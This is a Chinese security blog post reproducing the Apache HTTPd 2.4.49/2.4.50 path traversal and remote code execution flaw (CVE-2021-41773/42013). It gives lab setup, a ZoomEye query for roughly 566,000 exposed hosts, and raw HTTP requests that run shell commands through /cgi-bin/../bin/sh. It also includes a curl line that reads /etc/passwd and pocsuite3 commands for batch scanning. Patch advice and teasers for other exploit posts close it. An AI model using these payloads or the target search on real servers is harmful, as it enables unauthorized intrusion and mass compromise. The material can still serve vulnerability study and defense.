【賊詳細 | 附PoC工具】Apache HTTPd最新RCE漏洞復現

2021-12-18 滲透Xiao白帽

0x01 漏洞簡介:

   

    Apache HTTPd是Apache基金會開源的一款流行的HTTP伺服器。在Apache HTTPd 2.4.49版本中,存在一個 路徑穿越漏洞。在配置了 Require all granted後,攻擊者可利用路徑穿越漏洞讀取到Web目錄之外的其他文件,比 如/etc/passwd文件。同時若Apache HTTPd開啟了cgi支持,並能夠訪問到/bin/sh的情況下,攻擊者可構造惡意請 求執行命令,從而控制伺服器,危害嚴重。

0x02 影響版本:

ApacheHTTPd 2.4.49 ApacheHTTPd 2.4.50

0x03 漏洞等級:

0x04 環境搭建:

這裡提供兩個搭建方法可自行選擇

docker部署命令(一):

docker pull blueteamsteve/cve-2021-41773:with-cgiddocker run -d -p 7006:80 blueteamsteve/cve-2021-41773:with-cgid

搭建成功訪問是這個醬紫!

docker部署命令(二):

git clonehttps://github.com/blasty/CVE-2021-41773.gitcd CVE-2021-41773/docker-compose build docker-compose up -d

搭建成功訪問是這個醬紫!

0x05 影響範圍:

根據ZoomEye網絡空間搜尋引擎對潛在可能目標進行搜索,共得到 566,346 條IP歷史記錄。

ZoomEye語法:

app:"apache web server 2.4.49 2.4.50"

ZoomEye搜索連結:

https://www.zoomeye.org/searchResult?q=app%3A%22apache%20web%20server%202.4.49%202.4.50%22

0x06 漏洞復現:


PoC:

POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1Host: ip:portCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9If-None-Match: "29cd-5ce4665e39700-gzip"If-Modified-Since: Thu, 14 Oct 2021 01:57:16 GMTConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 39
echo Content-Type: text/plain; echo; id


POST /cgi-bin/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/bin/sh HTTP/1.1Host: ip:portCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9If-None-Match: "29cd-5ce4665e39700-gzip"If-Modified-Since: Thu, 14 Oct 2021 01:57:16 GMTConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 12
echo; whoami

curl --data "echo;cat /etc/passwd" 'http://ip:port/cgi-bin/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/bin/sh'

單個檢測命令如下:

python3 .\cli.py -r .\pocs\20211008_web_apache-httpd_dir-traversal-rce_cve-2021-41773_cve-2021-42013.py -u  https://*.*.*.* --verify

批量檢測命令如下:

python3 .\cli.py -r .\pocs\20211008_web_apache-httpd_dir-traversal-rce_cve-2021-41773_cve-2021-42013.py -f 1.txt --verify

獲取腳本直達車↓↓↓

https://github.com/knownsec/pocsuite3/blob/master/pocsuite3/pocs/20211008_web_apache-httpd_dir-traversal-rce_cve-2021-41773_cve-2021-42013.py

說到這裡就簡要介紹一下個人感覺非常好用的一款神器pocsuite3

    PocSuite3是Knownsec 404安全研究團隊設計的一款遠程漏洞測試以及PoC開發框架,該框架使用了功能極其強大的概念驗證引擎,並自帶了大量滲透測試以及安全分析功能。
功能介紹
1、PoC腳本能夠以attack、verify和shell等多種模式運行;2、自帶插件生態系統;3、 可從本地文件、Redis和資料庫等不同來源動態加載PoC腳本;4、 可從CIDR、本地文件、Redis、資料庫、Zoomeye和Shodan等來源加載多個測試目標;5、 輕鬆導出測試結果;6、 支持命令行工具和Python包導入;7、 支持IPv6;8、 支持全局HTTP/HTTPS/SOCKS代理;9、 提供了強大的爬蟲API;10、整合Seebug;11、整合ZoomEye;12、整合Shodan;13、整合Ceye;14、等等…

關於pocsuite3的詳細使用可以借鑑這個文檔,這裡不一一介紹!因為文檔比較詳細

https://github.com/knownsec/pocsuite3/tree/master/docs


0x07 建議解決方案:

若低於2.4.49版本,可不升級若Apache HTTPd為 2.4.49、2.4.50版本,請儘快升級至安全版本

0x08 參考連結:

https://mp.weixin.qq.com/s/Hpl5hMJYr7DtXyAeVuNwWQhttps://mp.weixin.qq.com/s/y1IWrujFBPduKcecwHtGnA

【往期回顧】

【往期推薦】

【內網滲透】內網信息收集命令匯總

【內網滲透】域內信息收集命令匯總

【超詳細 | Python】CS免殺-Shellcode Loader原理(python)

【超詳細 | Python】CS免殺-分離+混淆免殺思路

【超詳細 | 鍾馗之眼】ZoomEye-python命令行的使用

【超詳細 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞復現

【超詳細】CVE-2020-14882 | Weblogic未授權命令執行漏洞復現

【超詳細 | 附PoC】CVE-2021-2109 | Weblogic Server遠程代碼執行漏洞復現

【漏洞分析 | 附EXP】CVE-2021-21985 VMware vCenter Server 遠程代碼執行漏洞

【CNVD-2021-30167 | 附PoC】用友NC BeanShell遠程代碼執行漏洞復現

【超詳細】Microsoft Exchange 遠程代碼執行漏洞復現【CVE-2020-17144】

【超詳細】Fastjson1.2.24反序列化漏洞復現

  記一次HW實戰筆記 | 艱難的提權爬坑

【乾貨】最全的Tomcat漏洞復現

{Vulhub漏洞復現(一)ActiveMQ}

{Vulhub漏洞復現(二) Apereo CAS}

Cobalt Strike免殺腳本生成器|cna腳本|bypassAV

xss bypass備忘單|xss繞過防火牆技巧|xss繞過WAF的方法

走過路過的大佬們留個關注再走唄

往期文章有彩蛋哦

一如既往的學習,一如既往的整理,一如即往的分享

如侵權請私聊公眾號刪文

相關焦點

  • 【超詳細 | 附PoC】CVE-2021-2109 | Weblogic Server遠程代碼執行漏洞復現
    漏洞主要由JNDI注入,導致攻擊者可利用此漏洞遠程代碼執行。【超詳細】CVE-2020-14882 | Weblogic未授權命令執行漏洞復現所用到的工具網上都有,也可後臺回復"CVE-2021-2109"獲取0x04 漏洞復現PoC:POST /console
  • ​Apache Solr未授權上傳漏洞復現及驗證POC編寫
    solr下載地址:http://archive.apache.org/dist/lucene/solr/這次復現使用的是solr8.0.0版本靶機:win10,IP2.3、漏洞復現$out.available()])$str.valueOf($chr.toChars($out.read()))%23endwhoami執行成功了,漏洞復現成功
  • 通達OA 任意文件上傳+文件包含導致RCE漏洞復現
    該漏洞被黑產利用,用於投放勒索病毒。在繞過身份驗證的情況下通過文件上傳漏洞上傳惡意php文件,組合文件包含漏洞最終造成遠程代碼執行漏洞,從而導致可以控制伺服器system權限。0X01漏洞概述此漏洞是由未授權上傳和本地文件包含兩個漏洞組合而形成的rce漏洞文件上傳地址:http://localhost:801/ispirit/im/upload.php本地文件包含地址:http://localhost
  • Fastjson 1.2.47 RCE漏洞復現
    ,因為平時測試的時候,好像沒怎麼在意測試這個漏洞,復現過程中,漏洞環境挺好搭建的,只是在漏洞利用時,遇到了一些小問題,所以完整記錄下漏洞復現過程。root@ubuntu:/自動化編譯環境root@ubuntu:~/vulhub-master/fastjson/1.2.47-rce啟動漏洞環境root@ubuntu:~/vulhub-master/fastjson/1.2.47-rce驗證漏洞環境(http://ip:8090),返回json解析結果即漏洞環境可用了
  • Ruijie-EWEB網管系統遠程命令執行(CNVD-2021-09650)漏洞復現
    今天復現CNVD-2021-09650漏洞fofa語法也可用這個語法搜索poc該poc保存為後綴名是yml的文件name: poc-yaml-ruijie-rce-CNVD-2021-09650rules: - method: POST path: /guest_auth/guestIsUp.php headers: User-Agent
  • Apache HTTPD換行解析漏洞(CVE-2017-15715
    該漏洞屬於用戶配置不當所產生,與具體中間件版本無關。漏洞復現:使用vulhub進行復現,它是一個集成大量漏洞,方便漏洞復現的一個漏洞集合。l 進入漏洞復現的對應目錄,輸入命令:「cd vulhub-master/httpd/CVE-2017-15715」。l 啟動Docker容器,輸入命令:「docker-compose up -d」。
  • 【超詳細|附EXP】Tomcat Ajp文件讀取漏洞復現(CVE-2020-1938)
    目前Tomcat最新版本為9.0.41。apache tomcat 6apache tomcat 7 < 7.0.100apache tomcat 8 < 8.5.51apache tomcat 9 < 9.0.310X04 環境搭建這裡是在docker裡搭建的環境1、 啟動docker
  • 2020年紅方漏洞利用POC分享
    漏洞利用泛微OA e-cology WorkflowCenterTreeData前臺接口SQL注入漏洞復現資料庫小龍人-CSDN博客https://blog.csdn.net/zycdn/article/details/102494037Tentacle/ecology8_mobile_sql_inject.py
  • 漏洞復現 | Struts遠程命令執行漏洞
    二,漏洞版本Apache Struts 2.3.x系列中啟用了struts2-struts1-plugin插件的版本 三,漏洞復現poc%{#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).
  • Apache-Tomcat-Ajp漏洞(CVE-2020-1938)漏洞復現
    此漏洞為文件包含漏洞,攻擊者可利用該漏洞讀取或包含 Tomcat 上所有 webapp 目錄下的任意文件,如:webapp 配置文件、原始碼等。二、漏洞編號:cnvd-2020-10487cve-2020-1938三、受影響版本:apache tomcat 6apache tomcat 7 < 7.0.100apache tomcat 8 < 8.5.51apache tomcat 9 < 9.0.31已修復版本
  • 谷歌發布 Windows 10 圖形組件 RCE 漏洞的詳情
    聚焦原始碼安全,網羅國內外最新資訊!
  • spring boot (whitelabel error page SpEL RCE) 漏洞復現
    id=${7*7},如果發現報錯頁面將 7*7 的值 49 計算出來顯示在報錯頁面上,那麼基本可以確定目標存在 SpEL 表達式注入漏洞。漏洞環境:https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-spel-rce環境搭建:下載上述漏洞環境項目地址,在本地使用IDEA打開該項目,
  • Solr系列漏洞復現
    1.4 漏洞復現由於返回包中不包含我們傳入的XML中的信息,所以這是一個Blind XXE漏洞,我們發送如下數據包(自行修改其中的XXE Payload):/solr-8.2.0.zip)靶機:Mac OSIP:172.16.111.72攻擊機:Linux kaliIP:10.211.55.52.4 漏洞復現1、下載對應版本的Solr應用到靶機,進入到solr-8.2.0/bin目錄下查看solr.in.sh ,發現ENABLE_REMOTE_JMX_OPTS="true",該版本存在漏洞
  • Apache druid未授權命令執行漏洞復現
    此課程不僅會添加以往的安全事件,而且還會緊跟時事,去添加最新的安全事件。讓大家在第一時間了解,並懂得怎麼去保護自身安全為目的。由於Apache Druid 默認情況下缺乏授權認證,攻擊者可直接構造惡意請求執行任意代碼,控制伺服器。
  • CVE-2017-12542_HP-iLO4_RCE_簡單分析及復現
    name=CVE-2017-12542)是一個CVSS 9.8的高分漏洞,漏洞利用條件簡單,危害較大。近十年來,iLO是幾乎所有惠普伺服器中都嵌入的伺服器管理解決方案。它通過遠程管理的方式為系統管理員提供了需要的功能。包括電源管理,遠程系統控制臺,遠程CD/DVD映像安裝等。
  • [exp腳本] CVE-2018-7600 Drupal Drupalgeddon 2 RCE 漏洞復現
    二、漏洞簡介:Drupal 是一款用量龐大的CMS,其6/7/8版本的Form API中存在一處遠程代碼執行漏洞。相關詳細分析連結:https://research.checkpoint.com/uncovering-drupalgeddon-2/影響版本:Drupal 6.x、Drupal 7.x、Drupal 8.x三、漏洞復現:構造如下post數據包,即可執行命令:poc1:POST /user/register
  • Apache-Tomcat-Ajp(cve-2020-1938)漏洞復現
    一、漏洞描述:Apache與Tomcat都是Apache開源組織開發的用於處理
  • 漏洞復現之七:CVE-2019-17558 Apache Solr Velocity 注入遠程命令執行漏洞
    0x00 漏洞描述Apache Solr 是一個開源的搜索伺服器。
  • CVE-2021-3156 漏洞復現
    01月26日,sudo被披露存在一個基於堆的緩衝區溢出漏洞(CVE-2021-3156,該漏洞被命名為「Baron Samedit」),可導致本地權限提升。復現環境Kali漏洞檢測用戶可以使用非root的帳戶登錄系統,運行「 sudoedit -s / 」命令.若返回如圖以「 sudoedit:」開頭的錯誤,則當前系統可能存在安全風險。
  • 漏洞復現之三:CVE-2021-2109 Weblogic Server RCE
    0x00 漏洞描述CVE-2021-2109,該漏洞為Weblogic的遠程代碼執行漏洞。